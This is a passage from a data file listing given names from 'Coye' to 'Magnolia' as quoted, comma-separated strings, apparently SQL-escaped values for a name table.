'Coye',
'Craig',
'Cray',
'Creighton',
'Creola',
'Crescent',
'Crete',
'Crevan',
'Crispian',
'Crispin',
'Crissa',
'Cristee',
'Cristiana',
'Cristy',
'Crystal',
'Crysti',
'Cullen',
'Curry',
'Curt',
'Curtis',
'Cuthbert',
'Cutler',
'Cutter',
'Cy',
'Cybele',
'Cybil',
'Cybill',
'Cyd',
'Cyle',
'Cyma',
'Cyndi',
'Cynthia',
'Cypress',
'Cypriss',
'Cyrah',
'Cyril',
'Cyrus',
'D''lorah',
'Da-xia',
'Dabrisha',
'Dacey',
'Dafydd',
'Dagan',
'Dagmar',
'Dagobert',
'Dahlia',
'Dairne',
'Daisy',
'Dakir',
'Dakota',
'Dale',
'Dalene',
'Dalena',
'Dalia',
'Dalila',
'Dalit',
'Dallas',
'Dallin',
'Dalton',
'Dalva',
'Damaris',
'Dameion',
'Damian',
'Damiana',
'Damita',
'Damon',
'Dan',
'Dana',
'Danae',
'Dane',
'Danette',
'Dani',
'Danica',
'Daniel',
'Daniela',
'Danielle',
'Danika',
'Danil',
'Danitra',
'Dannie',
'Danniell',
'Danny',
'Dantae',
'Dante',
'Danton',
'Danyl',
'Daphne',
'Dara',
'Daray',
'Darby',
'Darcey',
'Darcie',
'Darcy',
'Dard',
'Daria',
'Darian',
'Darin',
'Dario',
'Daris',
'Darla',
'Darlene',
'Darnell',
'Darrell',
'Darren',
'Darrin',
'Darrion',
'Darrius',
'Darryl',
'Darshan',
'Darwin',
'Daryl',
'Dasan',
'Dasani',
'Dasha',
'Davan',
'Dave',
'Davi',
'David',
'Davida',
'Davin',
'Davina',
'Davis',
'Davonna',
'Davu',
'Dawn',
'Dawson',
'Dax',
'Daxton',
'Daylin',
'Dayna',
'Dayne',
'Dayton',
'Dea',
'Dean',
'Deandra',
'Deanna',
'Deanne',
'D''ante',
'Debbie',
'Debby',
'Deborah',
'Debra',
'Declan',
'Deidra',
'Deiondre',
'Deirdra',
'Deirdre',
'Deiter',
'Deja',
'Dejah',
'Dejalysse',
'Dejaun',
'Deka',
'Del',
'Delaine',
'Delaney',
'Delbert',
'Delfina',
'Delia',
'Delila',
'Delilah',
'Deliz',
'Della',
'Delling',
'Delores',
'Delphine',
'Delta',
'Delu',
'Demario',
'Dembe',
'Demetria',
'Demetrius',
'Demi',
'Demitrius',
'Demonio',
'Demoryea',
'Dempster',
'Den''e',
'Dena',
'Denali',
'Deniro',
'Denis',
'Denisa',
'Denise',
'Denna',
'Dennis',
'Dennise',
'Denver',
'Denyce',
'Denyne',
'Denyse',
'Denzil',
'Denzyl',
'Deo',
'Deon',
'Derby',
'Derek',
'Derex',
'Derica',
'Dermot',
'Derora',
'Derrick',
'Derron',
'Derry',
'Des',
'Desana',
'Desdemona',
'Deserae',
'Desi',
'Desiderio',
'Desiree',
'Desmond',
'Dessa',
'Dessie',
'Destiny',
'Deva',
'Devaki',
'Devereaux',
'Devi',
'Devin',
'Devon',
'Devorah',
'Devorit',
'Dewey',
'Dewitt',
'Dexter',
'Dextra',
'Deyana',
'Dezarae',
'Diallo',
'Diamond',
'Diana',
'Diane',
'Dianne',
'Diantha',
'Dianthe',
'Diata',
'Diavion',
'Dick',
'Didier',
'Didrika',
'Diego',
'Dijon',
'Diliza',
'Dillan',
'Dillian',
'Dillon',
'Dina',
'Dinah',
'Dino',
'Dion',
'Diondra',
'Dionna',
'Dionne',
'Dionysius',
'Dionysus',
'Dior',
'Dirk',
'Dixie',
'Dixon',
'Dmitri',
'Doane',
'Doctor',
'Doda',
'Doi',
'Dolly',
'Dolores',
'Dolph',
'Dom',
'Domani',
'Dominic',
'Dominick',
'Dominique',
'Dominy',
'Don',
'Donagh',
'Donahi',
'Donal',
'Donald',
'Donat',
'Donato',
'Donelle',
'Donna',
'Donnel',
'Donnica',
'Donny',
'Donovan',
'Dora',
'Doran',
'Dorcas',
'Dore',
'Dori',
'Doria',
'Dorian',
'Dorie',
'Dorinda',
'Doris',
'Dorit',
'Dorothea',
'Dorothy',
'Dorrance',
'Dorset',
'Dorsey',
'Dory',
'Dot',
'Dotty',
'Doug',
'Dougal',
'Douglas',
'Douglass',
'Dove',
'Doyle',
'Doyt',
'Drake',
'Dreama',
'Drew',
'Dru',
'Dryden',
'Duane',
'Duc',
'Dudley',
'Duena',
'Duff',
'Dugan',
'Duka',
'Duke',
'Dulce',
'Dulcea',
'Dulcina',
'Dulcinea',
'Dumi',
'Duncan',
'Dunixi',
'Dunja',
'Dunn',
'Dunne',
'Durlie',
'Duscha',
'Dustin',
'Dusty',
'Duvon',
'Duwane',
'Dwayne',
'Dwight',
'Dyan',
'Dyani',
'Dyanne',
'Dylan',
'Dyllis',
'Dyre',
'Dysis',
'Eadoin',
'Eamon',
'Earl',
'Earlene',
'Earnest',
'Easter',
'Easton',
'Eavan',
'Ebony',
'Echo',
'Ed',
'Edalene',
'Edaline',
'Edana',
'Edda',
'Eddie',
'Eddy',
'Edeline',
'Eden',
'Edena',
'Edgar',
'Edie',
'Edison',
'Edita',
'Edith',
'Edmund',
'Edna',
'Edric',
'Edward',
'Edwardo',
'Edwin',
'Edwina',
'Edwiygh',
'Edythe',
'Effie',
'Efrat',
'Efrem',
'Egan',
'Ehren',
'Eileen',
'Eilis',
'Eiman',
'Eitan',
'Ejlicey',
'Ela',
'Elaina',
'Elaine',
'Elan',
'Elana',
'Elani',
'Elata',
'Elda',
'Elden',
'Eldon',
'Eldora',
'Eleanor',
'Electra',
'Elena',
'Eleni',
'Elephteria',
'Elgin',
'Eli',
'Elia',
'Eliana',
'Elias',
'Elie',
'Elijah',
'Elin',
'Eliora',
'Eliot',
'Elisabeth',
'Elise',
'Elisha',
'Elita',
'Eliza',
'Elizabeth',
'Eljah',
'Elkan',
'Elke',
'Ella',
'Ellard',
'Elle',
'Ellema',
'Ellen',
'Ellery',
'Ellie',
'Elliot',
'Elliott',
'Ellis',
'Ellisa',
'Elmo',
'Elodie',
'Eloise',
'Elsa',
'Elsie',
'Elspeth',
'Elton',
'Elu',
'Elva',
'Elvin',
'Elvina',
'Elvira',
'Elvis',
'Ely',
'Elysia',
'Elyssa',
'Elza',
'Emaline',
'Emani',
'Emanuel',
'Emanuele',
'Emele',
'Emene',
'Emera',
'Emerald',
'Emery',
'Emese',
'Emil',
'Emilia',
'Emilie',
'Emiliee',
'Emilio',
'Emily',
'Emira',
'Emma',
'Emmagin',
'Emmanuel',
'Emmet',
'Emmett',
'Emmly',
'Emory',
'Enid',
'Ennis',
'Enos',
'Enrico',
'Envy',
'Eolande',
'Ephraim',
'Epifanio',
'Er',
'Erasmus',
'Eri',
'Eric',
'Erica',
'Erik',
'Erika',
'Erimentha',
'Erin',
'Eris',
'Erland',
'Erma',
'Erme',
'Ermin',
'Erna',
'Ernest',
'Ernie',
'Erno',
'Eron',
'Eros',
'Errin',
'Errol',
'Erv',
'Ervin',
'Erwin',
'Eryk',
'Esben',
'Eshe',
'Esma',
'Esmerelda',
'Essie',
'Esteban',
'Estefania',
'Estelle',
'Ester',
'Esther',
'Estralita',
'Etan',
'Etana',
'Eternity',
'Ethan',
'Ethel',
'Ethelda',
'Etta',
'Eudora',
'Eugene',
'Eulalia',
'Eulalie',
'Eupemia',
'Euphemia',
'Euridice',
'Eva',
'Evalina',
'Evan',
'Evane',
'Evangeline',
'Evania',
'Eve',
'Evelia',
'Evelien',
'Evelyn',
'Everett',
'Evette',
'Evi',
'Evie',
'Evita',
'Evonne',
'Ewa',
'Eyal',
'Eydie',
'Ezekiel',
'Ezra',
'Fabian',
'Fabienne',
'Fabiola',
'Fabricio',
'Fabrizio',
'Fabunni',
'Fahaad',
'Fahd',
'Faire',
'Fairfax',
'Fairly',
'Faith',
'Fala',
'Fale',
'Fallon',
'Falona',
'Fanchon',
'Fane',
'Farah',
'Farica',
'Faris',
'Farley',
'Farrah',
'Farrell',
'Farren',
'Farrest',
'Fatima',
'Fatmira',
'Fausta',
'Faustine',
'Favian',
'Fawn',
'Fay',
'Faye',
'Faylinn',
'Faymatu',
'Fedora',
'Feivel',
'Feleti',
'Felice',
'Felicia',
'Felicity',
'Felimy',
'Felina',
'Felix',
'Fell',
'Felton',
'Fennella',
'Feoras',
'Ferdinand',
'Fergal',
'Fergus',
'Ferguson',
'Fern',
'Fernandez',
'Fernando',
'Ferris',
'Ferrol',
'Fiachra',
'Fico',
'Fidel',
'Fidelia',
'Fidelio',
'Fidella',
'Field',
'Filbert',
'Filia',
'Filipina',
'Fineen',
'Finley',
'Finn',
'Finna',
'Finola',
'Fiona',
'Fionan',
'Fionn',
'Fionnula',
'Fiorenza',
'Fisk',
'Fisseha',
'Flan',
'Flannery',
'Flavia',
'Flavian',
'Fletcher',
'Fleur',
'Flint',
'Flo',
'Flora',
'Floramaria',
'Florence',
'Floria',
'Floriane',
'Florida',
'Florrie',
'Flower',
'Floyd',
'Flynn',
'Fola',
'Fonda',
'Fondea',
'Forbes',
'Ford',
'Fordon',
'Forrest',
'Forrester',
'Forster',
'Fortune',
'Foster',
'Fotini',
'Fountain',
'Fox',
'Foy',
'Fraley',
'Fran',
'Frances',
'Francesca',
'Francis',
'Francois',
'Frank',
'Franklin',
'Franz',
'Frasier',
'Frayne',
'Fred',
'Freddy',
'Frederica',
'Frederick',
'Fredrica',
'Freed',
'Freeman',
'Freja',
'Fremont',
'Freya',
'Frieda',
'Fritz',
'Fritzi',
'Frode',
'Fronde',
'Fruma',
'Frye',
'Fulbright',
'Fuller',
'Fynn',
'Gabby',
'Gabe',
'Gabi',
'Gabriel',
'Gabriela',
'Gabriella',
'Gabrielle',
'Gaby',
'Gaetan',
'Gaetane',
'Gafna',
'Gage',
'Gail',
'Gailia',
'Gaille',
'Gainell',
'Gaius',
'Gale',
'Galen',
'Galeno',
'Gali',
'Gallagher',
'Gallia',
'Galvin',
'Gamada',
'Gamal',
'Gamaliel',
'Ganaya',
'Ganit',
'Gannon',
'Ganya',
'Gardner',
'Gareth',
'Garfield',
'Garland',
'Garren',
'Garret',
'Garrett',
'Garrick',
'Garrison',
'Garron',
'Garry',
'Garson',
'Garth',
'Garvey',
'Gary',
'Gates',
'Gaurav',
'Gautier',
'Gavan',
'Gavin',
'Gavivi',
'Gavril',
'Gawain',
'Gay',
'Gaye',
'Gayle',
'Gaylord',
'Gaynell',
'Gazali',
'Gazelle',
'Gazit',
'Gella',
'Gelsey',
'Gemma',
'Gene',
'Genell',
'Genesis',
'Genet',
'Geneva',
'Genevieve',
'Genna',
'Gent',
'Geoff',
'Geoffrey',
'Geordi',
'George',
'Georgette',
'Georgia',
'Georgina',
'Gerald',
'Geraldene',
'Geraldine',
'Geraldo',
'Gerard',
'Gerardo',
'Gerene',
'Gerda',
'Geri',
'Gerik',
'Germain',
'Germaine',
'Gerodi',
'Gerry',
'Gershom',
'Gertrude',
'Gethan',
'Ghita',
'Giacomo',
'Gian',
'Gianina',
'Gianna',
'Giavanna',
'Gibson',
'Gideon',
'Gigi',
'Gil',
'Gilbert',
'Gilda',
'Giles',
'Gili',
'Gillespie',
'Gillian',
'Gin',
'Gina',
'Ginacarlo',
'Ginata',
'Ginger',
'Ginny',
'Gino',
'Giolla',
'Giorgio',
'Giovanett',
'Giovanni',
'Gira',
'Gisela',
'Giselle',
'Gita',
'Gitano',
'Gitel',
'Gittel',
'Giulio',
'Giuseppe',
'Giva',
'Giza',
'Gladys',
'Glen',
'Glenda',
'Glenn',
'Glenna',
'Glennis',
'Glenys',
'Glinora',
'Glora',
'Gloria',
'Glory',
'Glyn',
'Glynis',
'Glynnis',
'Godana',
'Godfrey',
'Golda',
'Goldie',
'Goldy',
'Gomer',
'Gordon',
'Gordy',
'Grace',
'Gracie',
'Grady',
'Graham',
'Gram',
'Grania',
'Grant',
'Granville',
'Gratia',
'Gratiana',
'Grayce',
'Grayson',
'Grazia',
'Greer',
'Greg',
'Gregg',
'Gregory',
'Greta',
'Gretchen',
'Gretel',
'Grier',
'Griffin',
'Griselda',
'Grizelda',
'Grover',
'Guadalupe',
'Gualtier',
'Guban',
'Gudrun',
'Guenevere',
'Guido',
'Guinevere',
'Gunda',
'Gunnar',
'Gunther',
'Gur',
'Gure',
'Guri',
'Gurit',
'Gusanthony',
'Gustav',
'Guy',
'Gwen',
'Gwendolyn',
'Gwyn',
'Gwyneth',
'Gypsy',
'Haben',
'Habib',
'Hachi',
'Hada',
'Hadar',
'Hadassah',
'Hadley',
'Hafiz',
'Haile',
'Haines',
'Hajari',
'Hal',
'Halen',
'Haley',
'Hali',
'Halim',
'Halley',
'Halona',
'Ham',
'Hamal',
'Hamdia',
'Hamilton',
'Hamlet',
'Hamlin',
'Hampton',
'Hana',
'Hanan',
'Hanibal',
'Hanifa',
'Hank',
'Hanley',
'Hanna',
'Hannah',
'Hannelore',
'Hannibal',
'Hans',
'Hanzila',
'Hao',
'Haracha',
'Harel or harrell',
'Harlan',
'Harley',
'Harlow',
'Harmon',
'Harmony',
'Harold',
'Haroun',
'Harper',
'Harriet',
'Harrison',
'Harry',
'Hart',
'Hartwell',
'Haru',
'Haruki',
'Haruko',
'Haruni',
'Harva',
'Harvey',
'Hasad',
'Hasan',
'Hasana',
'Hastin',
'Hateya',
'Haven',
'Hawa',
'Hayden',
'Haylee',
'Hayleigh',
'Hayley',
'Hayward',
'Hazeka',
'Hazel',
'Hazelle',
'Hazina',
'Heath',
'Heather',
'Heaven',
'Heavynne',
'Hector',
'Hedda',
'Hedia',
'Hedva',
'Hedwig',
'Hedy',
'Hedya',
'Heidi',
'Heinz',
'Helaina',
'Helaine',
'Helen',
'Helena',
'Helene',
'Helga',
'Helia',
'Heller',
'Heloise',
'Henri',
'Henrietta',
'Henrik',
'Henry',
'Hera',
'Herb',
'Herbert',
'Herbst',
'Heremon',
'Herman',
'Herschel',
'Hertz',
'Hesper',
'Hester',
'Hestia',
'Hewitt',
'Hidalgo',
'Hidi',
'Hiero',
'Hija',
'Hila',
'Hilaire',
'Hilary',
'Hilda',
'Hilde',
'Hillary',
'Hilzarie',
'Hina',
'Hinda',
'Hiroko',
'Hirsi',
'Holden',
'Holiday',
'Hollace',
'Holli',
'Hollie',
'Hollis',
'Holly',
'Hollye',
'Holt',
'Homer',
'Honey',
'Honora',
'Honoria',
'Hope',
'Horace',
'Horst',
'Horus',
'Hosea',
'Hosein',
'Hoshi',
'Hoshiko',
'Houston',
'Howard',
'Howe',
'Howell',
'Howie',
'Hoyt',
'Hubert',
'Hue',
'Huela',
'Huey',
'Hugh',
'Hugo',
'Humphrey',
'Hunter',
'Hurley',
'Huslu',
'Huso',
'Hussein',
'Huxley',
'Hy',
'Hyacinth',
'Hyman',
'Hyroniemus',
'Ian',
'Ianna',
'Ianthe',
'Ida',
'Idalee',
'Idalia',
'Idana',
'Idande',
'Idania',
'Idra',
'Iesha',
'Ife',
'Ifeoma',
'Igball',
'Ige',
'Iggi',
'Iggy',
'Ignacio',
'Ignatius',
'Ike',
'Ikechukwa',
'Ikenna',
'Ikennachukwa',
'Ilana',
'Ilario',
'Ileana',
'Ilia',
'Iliana',
'Ilit',
'Ilo',
'Ilom',
'Ilori',
'Ilse',
'Ilyssa',
'Iman',
'Imogene',
'Ina',
'Inari',
'Inci',
'Independence',
'India',
'Indira',
'Indra',
'Inez',
'Infinity',
'Inga',
'Inge',
'Ingrid',
'Inoke',
'Iola',
'Iolani',
'Ion',
'Iona',
'Ipo',
'Ira',
'Iram',
'Irene',
'Iria',
'Irida',
'Irina',
'Iris',
'Irisa',
'Irma',
'Irving',
'Iryl',
'Isaac',
'Isabel',
'Isabis',
'Isadora',
'Isaiah',
'Isanne',
'Isao',
'Isha',
'Isi',
'Isidro',
'Isis',
'Isleen',
'Ismaela',
'Ismail',
'Ismet',
'Isolde',
'Isra',
'Israel',
'Issay',
'Ita',
'Italia',
'Iuliana',
'Iulianna',
'Ivan',
'Ivet',
'Ivi',
'Ivie',
'Ivo',
'Ivria',
'Ivrit',
'Ivy',
'Iyana',
'Iyende',
'Iyindi',
'Izefia',
'Izegbe',
'Izellah',
'Ja',
'Jaala',
'Jaali',
'Jabari',
'Jabilo',
'Jabir',
'Jabulani',
'Jace',
'Jacinda',
'Jacinta',
'Jack',
'Jackie',
'Jackson',
'Jaclyn',
'Jacob',
'Jacoba',
'Jacqueline',
'Jacquelyn',
'Jacques',
'Jacquetta',
'Jacqui',
'Jacquleyn',
'Jada',
'Jade',
'Jaden',
'Jadon',
'Jadyn',
'Jael',
'Jafaru',
'Jahazel',
'Jai',
'Jaime',
'Jaimie',
'Jake',
'Jaleel',
'Jalen',
'Jalene',
'Jalil',
'Jalila',
'Jamal',
'Jamar',
'James',
'Jamesa',
'Jamese',
'Jami',
'Jamie',
'Jamila',
'Jan',
'Jana',
'Janae',
'Janai',
'Jancy',
'Jane',
'Janel',
'Janelis',
'Janelle',
'Janet',
'Janette',
'Jania',
'Janiah',
'Janice',
'Janina',
'Janine',
'Jantz',
'Japheth',
'Jara',
'Jarah',
'Jared',
'Jariath',
'Jarod',
'Jarrett',
'Jarvis',
'Jasa',
'Jasalynn',
'Jasmine',
'Jason',
'Jasper',
'Jatupol',
'Jaurene',
'Javen',
'Javier',
'Jay',
'Jayce',
'Jayden',
'Jaymar',
'Jayme',
'Jazel',
'Jazlynn',
'Jealexiz',
'Jean',
'Jeanette',
'Jeanine',
'Jeanne',
'Jeb',
'Jebediah',
'Jedidiah',
'Jeff',
'Jefferson',
'Jeffrey',
'Jemima',
'Jena',
'Jenelle',
'Jenesis',
'Jengo',
'Jenike',
'Jenis',
'Jenna',
'Jennelle',
'Jennessa',
'Jenni',
'Jennie',
'Jennifer',
'Jennika',
'Jenny',
'Jens',
'Jensen',
'Jered',
'Jeremiah',
'Jeremy',
'Jeri',
'Jerica',
'Jericho',
'Jermaine',
'Jermica',
'Jerod',
'Jeroen',
'Jerold',
'Jerom',
'Jerome',
'Jerommeke',
'Jerrell',
'Jerrick',
'Jerry',
'Jerusha',
'Jess',
'Jessalyn',
'Jesse',
'Jessica',
'Jessie',
'Jesup',
'Jesus',
'Jethro',
'Jett',
'Jewel',
'Jewelysa',
'Jewell',
'Jewl',
'Jewlana',
'Jezebel',
'Jianna',
'Jihan',
'Jill',
'Jillian',
'Jim',
'Jimi',
'Jimmy',
'Jin',
'Jina',
'Jinda',
'Jira',
'Jiro',
'Joan',
'Joann',
'Joanna',
'Joanne',
'Job',
'Jocasta',
'Jocelyn',
'Jock',
'Joda',
'Jodi',
'Jodie',
'Jody',
'Joe',
'Joel',
'Joelle',
'Joey',
'Johann',
'Johanna',
'John',
'Johnny',
'Joi',
'Joie',
'Jola',
'Jolene',
'Jolie',
'Jolina',
'Jon',
'Jonah',
'Jonathan',
'Jonny',
'Jordan',
'Joren',
'Jorge',
'Jorn',
'Jorrin',
'Jorunn',
'Jorryn',
'Jory',
'Jose',
'Josef',
'Joseph',
'Josephine',
'Joselyn',
'Josh',
'Joshua',
'Joshwa',
'Josiah',
'Josie',
'Joslyn',
'Josue',
'Jovan',
'Jovana',
'Jovianne',
'Jovita',
'Joy',
'Joyce',
'Joylyn',
'Juan',
'Juana',
'Juandalynn',
'Juani',
'Juanita',
'Jubal',
'Jud',
'Judah',
'Judd',
'Jude',
'Judith',
'Judson',
'Judy',
'Juji',
'Jules',
'Julia',
'Julian',
'Juliana',
'Julianna',
'Julianne',
'Julliatte',
'Julie',
'Juliet',
'Julieta',
'Juliette',
'Julio',
'Julisa',
'Julissa',
'Julisha',
'July',
'Jumoke',
'Jun',
'June',
'Junior',
'Juniper',
'Justin',
'Justina',
'Justine',
'Justise',
'Justyn',
'Kabibe',
'Kabili',
'Kabira',
'Kacela',
'Kacey',
'Kachina',
'Kacy',
'Kadeem',
'Kadin',
'Kael',
'Kaeley',
'Kaelin',
'Kaethe',
'Kahlia',
'Kahlilia',
'Kai',
'Kaikura',
'Kailey',
'Kaitlin',
'Kaitlyn',
'Kaiya',
'Kalani',
'Kalb',
'Kalea',
'Kaleanne',
'Kaleb',
'Kaleena',
'Kaleeyse',
'Kalena',
'Kalei',
'Kaleigh',
'Kaley',
'Kali',
'Kalila',
'Kalilah',
'Kalin',
'Kalinda',
'Kalista',
'Kalli',
'Kamal',
'Kamali',
'Kamari',
'Kamau',
'Kambriea',
'Kame',
'Kamella',
'Kameryn',
'Kamil',
'Kamilia',
'Kande',
'Kandice',
'Kane',
'Kapi',
'Kara',
'Karan',
'Karana',
'Kare',
'Kareem',
'Karen',
'Karena',
'Kari',
'Karia',
'Karie',
'Karik',
'Karim',
'Karimah',
'Karina',
'Karis',
'Karissa',
'Karl',
'Karla',
'Karli',
'Karma',
'Karmael',
'Karmina',
'Karna',
'Karston',
'Kasi',
'Kasim',
'Kaspar',
'Kassandra',
'Kassel',
'Kassia',
'Kat',
'Kata',
'Kate',
'Katelin',
'Katharine',
'Katherine',
'Kathie',
'Kathleen',
'Kathryn',
'Kathy',
'Katie',
'Katina',
'Katiryn',
'Kato',
'Kator',
'Katrina',
'Katy',
'Kaula',
'Kawena',
'Kay',
'Kaya',
'Kaycee',
'Kaydee',
'Kayden',
'Kayin',
'Kayla',
'Kaylana',
'Kaylee',
'Kaylee-ann',
'Kaylen',
'Kaylia',
'Kayo',
'Kayonga',
'Kaz',
'Kazi',
'Kazimierz',
'Kazu',
'Keagan',
'Keaira',
'Keanu',
'Keara',
'Keb',
'Kedem',
'Kedma',
'Keefe',
'Keefer',
'Keegan',
'Keelan',
'Keelia',
'Keely',
'Keena',
'Keenan',
'Keene',
'Keeya',
'Kefira',
'Kei',
'Keiji',
'Keiki',
'Keiko',
'Keir',
'Keira',
'Keiran',
'Keisha',
'Keita',
'Keitaro',
'Keith',
'Kelby',
'Kelda',
'Kele',
'Kelea',
'Kelii',
'Kelila',
'Kellan',
'Kellee',
'Kellen',
'Kelley',
'Kelli',
'Kellie',
'Kellsie',
'Kelly',
'Kelsey',
'Kelsi',
'Kelsie-lynn',
'Kelton',
'Kelvin',
'Kemmora',
'Ken',
'Kenadia',
'Kenadie',
'Kenda',
'Kendall',
'Kendi',
'Kendis',
'Kendra',
'Keneisha',
'Kenisha',
'Kenley',
'Kenna',
'Kennan',
'Kennedi',
'Kennedie',
'Kennedy',
'Kenneth',
'Kenny',
'Kent',
'Kenton',
'Kenvee',
'Kenyi',
'Kenyon',
'Kenzie',
'Keola',
'Keon',
'Keosha',
'Kera',
'Kerda',
'Keren',
'Kerica',
'Kermit',
'Kern',
'Kerr',
'Kerri',
'Kerry',
'Kerstiana',
'Kesin',
'Kessler',
'Ketara',
'Keturah',
'Kevin',
'Kevina',
'Key',
'Keyanna',
'Keyon',
'Keytanna',
'Keziah',
'Khalida',
'Khalil',
'Khalipha',
'Khiry',
'Khrystin',
'Khursten',
'Kia',
'Kiah',
'Kiaira',
'Kiana',
'Kiandra',
'Kiara',
'Kibibe',
'Kiden',
'Kieran',
'Kiersten',
'Kiho',
'Kiki',
'Kiley',
'Killian',
'Kim',
'Kimball',
'Kimberly',
'Kimi',
'Kimmy',
'Kin',
'Kina',
'Kindra',
'Kinfe',
'King',
'Kingston',
'Kinipela',
'Kioko',
'Kione',
'Kiora',
'Kipling',
'Kiplyn',
'Kipp',
'Kira',
'Kirabo',
'Kiral',
'Kirby',
'Kiri',
'Kiril',
'Kirk',
'Kiros',
'Kirra',
'Kirsi',
'Kirsten',
'Kirstie',
'Kirstin',
'Kirstyn',
'Kisha',
'Kishi',
'Kita',
'Kitoko',
'Kitra',
'Kitty',
'Kiyo',
'Kiyone',
'Kiyoshi',
'Kizzy',
'Kjiristen',
'Klania',
'Klaus',
'Klitos',
'Knut',
'Koda',
'Koen',
'Kohana',
'Koine',
'Koko',
'Kola',
'Kole',
'Kolton',
'Konane',
'Konrad',
'Kordell',
'Koren',
'Korene',
'Kori',
'Korina',
'Korinne',
'Korrie',
'Kortnie',
'Kory',
'Kostya',
'Koto',
'Kourtney',
'Kozue',
'Kris',
'Krisidian',
'Krista',
'Kristen',
'Kristian',
'Kristin',
'Kristina',
'Kristine',
'Kristopher',
'Kristy',
'Krystal',
'Krystyn',
'Kuma',
'Kumi',
'Kumiko',
'Kuniko',
'Kura',
'Kuri',
'Kuron',
'Kurt',
'Kwanita',
'Kyla',
'Kylan',
'Kyle',
'Kyleigh',
'Kylene',
'Kyler',
'Kyley',
'Kylia',
'Kylie',
'Kymberlee',
'Kyna',
'Kynan',
'Kynthia',
'Kynton',
'Kyra',
'Kyrene',
'Kyria',
'L''pree',
'La don',
'Lacey',
'Lachlan',
'Lacy',
'Laddie',
'Ladona',
'Lael',
'Lahela',
'Lahoma',
'Laila',
'Lailani',
'Laina',
'Laird',
'Lajuan',
'Lajuana',
'Lakeisha',
'Lakin',
'Lala',
'Lale',
'Laleh',
'Lalena',
'Lali',
'Lalita',
'Lalo',
'Lamar',
'Lamesha',
'Lamia',
'Lamont',
'Lan',
'Lana',
'Lanai',
'Lanaya',
'Lance',
'Lancelot',
'Landen',
'Landers',
'Landis',
'Landon',
'Landry',
'Lane',
'Lanelle',
'Lang',
'Langer',
'Langston',
'Lani',
'Lanier',
'Lankston',
'Lanza',
'Laqueta',
'Lara',
'Laree',
'Laraine',
'Lareina',
'Larie',
'Larissa',
'Lark',
'Larkin',
'Larry',
'Lars',
'Larue',
'Larvall',
'Lasca',
'Lashanda',
'Lassie',
'Laszlo',
'Latanya',
'Latasha',
'Lateefa',
'Laterian',
'Latham',
'Lathrop',
'Latika',
'Latimer',
'Latisha',
'Latoya',
'Laura',
'Lauren',
'Laurence',
'Laurie',
'Laval',
'Lavaun',
'Lave',
'Laverne',
'Lavey',
'Lavi',
'Lavonn',
'Lavonne',
'Lawanda',
'Lawrence',
'Lawrencia',
'Layla',
'Layne',
'Lazar',
'Lazarus',
'Lazzaro',
'Le',
'Lea',
'Leaerialle',
'Leah',
'Leal',
'Leala',
'Leander',
'Leane',
'Leanna',
'Leanne',
'Learay',
'Leata',
'Leavitt',
'Lecea',
'Lechelsea',
'Ledarrius',
'Leda',
'Ledell',
'Lee',
'Leeanne',
'Leena',
'Leeto',
'Leevy',
'Legend',
'Lehana',
'Leia',
'Leif',
'Leigh',
'Leigha',
'Leighanna',
'Leila',
'Leilani',
'Leimomi',
'Lekey',
'Lel',
'Lela',
'Leland',
'Lelia',
'Lamanuel',
'Lemuel',
'Lena',
'Lencho',
'Leneva',
'Lenka',
'Lenna',
'Lenora',
'Lenore',
'Lente',
'Leo',
'Leola',
'Leoma',
'Leon',
'Leona',
'Leonard',
'Leone',
'Leoni',
'Leonie',
'Leonora',
'Leonzal',
'Leopold',
'Leora',
'Leota (f)',
'Leotas (m)',
'Laquenna',
'Laqueenie',
'Leigh',
'Lerato',
'Lerin',
'Leroy',
'Les',
'Lesa',
'Lesha',
'Lesley',
'Leslie',
'Less',
'Lester',
'Leticia or letticia',
'Letitia',
'Letoya',
'Lev',
'Levana',
'Leverett',
'Levi',
'Levia',
'Levon',
'Lewa',
'Lewis',
'Lex',
'Lexi',
'Lexine',
'Lexiss',
'Leyva',
'Lia',
'Liam',
'Lian',
'Liana',
'Libba',
'Libby',
'Liberty',
'Lida',
'Lidia',
'Lien',
'Liko',
'Lila',
'Lilac',
'Lilah',
'Lilia',
'Liliauna',
'Liliha',
'Lilith',
'Lilli',
'Lillian',
'Lillion',
'Lilo',
'Lily',
'Lin',
'Lina',
'Lincoln',
'Linda',
'Lindley',
'Lindsay',
'Lindsey',
'Lindy',
'Linette',
'Linna',
'Linus',
'Liona',
'Lionel',
'Lirit',
'Lisa',
'Lisandra',
'Lisbet',
'Lisette',
'Lisimba',
'Lisle',
'Lita',
'Liv',
'Livana',
'Livi',
'Livia',
'Livvy',
'Lixue',
'Liz',
'Liza',
'Lizbeth',
'Lizett',
'Lizina',
'Llewellyn',
'Lloyd',
'Loba',
'Lobo',
'Locke',
'Loe',
'Logan',
'Lois',
'Lola',
'Lolonyo',
'Lolovivi',
'Lolymiya',
'Loman',
'Lona',
'Lonato',
'London',
'Lonna',
'Lonni',
'Lonnie',
'Lonnit',
'Lora',
'Lorelei',
'Lorena',
'Lorenzo',
'Loretta',
'Lori',
'Lorie',
'Lorimer',
'Lorin',
'Loring',
'Lorna',
'Lorne',
'Lorraine',
'Lorretta',
'Lory',
'Lotta',
'Lotte',
'Lotus',
'Lou',
'Louanna',
'Loughlin',
'Louis',
'Louisa',
'Louise',
'Loura',
'Lourana',
'Lourdes',
'Lourine',
'Love',
'Lovette',
'Lovey',
'Lovie',
'Lowell',
'Luam',
'Luana',
'Lucas',
'Luce',
'Lucia',
'Lucian',
'Lucie',
'Lucille',
'Lucinda',
'Lucio',
'Lucius',
'Lucretia',
'Lucus',
'Lucy',
'Ludema',
'Ludlow',
'Ludwig',
'Luigi',
'Luis',
'Luke',
'Lula',
'Lulli',
'Lulu',
'Luna',
'Lundy',
'Lunette',
'Lupe',
'Lupita',
'Luthando',
'Luther',
'Ly',
'Lyannie',
'Lyde',
'Lydette',
'Lydia',
'Lyle',
'Lyn',
'Lynae',
'Lynch',
'Lynda',
'Lynde',
'Lyndel',
'Lyndon',
'Lyndsey',
'Lynelle',
'Lynette',
'Lynley',
'Lynn',
'Lynna',
'Lynne',
'Lynnea',
'Lynton',
'Lyre',
'Lyris',
'Lysa',
'Lysander',
'Lysandra',
'Maarten',
'Maat',
'Mabel',
'Mac',
'Macayle',
'Mace',
'Maceo',
'Macha',
'Mackenzie',
'Mactarr',
'Macy',
'Madaleno',
'Maddox',
'Madeleine',
'Madelia',
'Madeline',
'Madge',
'Madison & madyson',
'Madonna',
'Madra',
'Madrona',
'Mae',
'Maeko',
'Maemi',
'Maeron',
'Maeryn',
'Maeve',
'Magan',
'Magda',
'Magdalena',
'Magdalene',
'Magee',
'Maggie',
'Magnar',
'Magnolia',
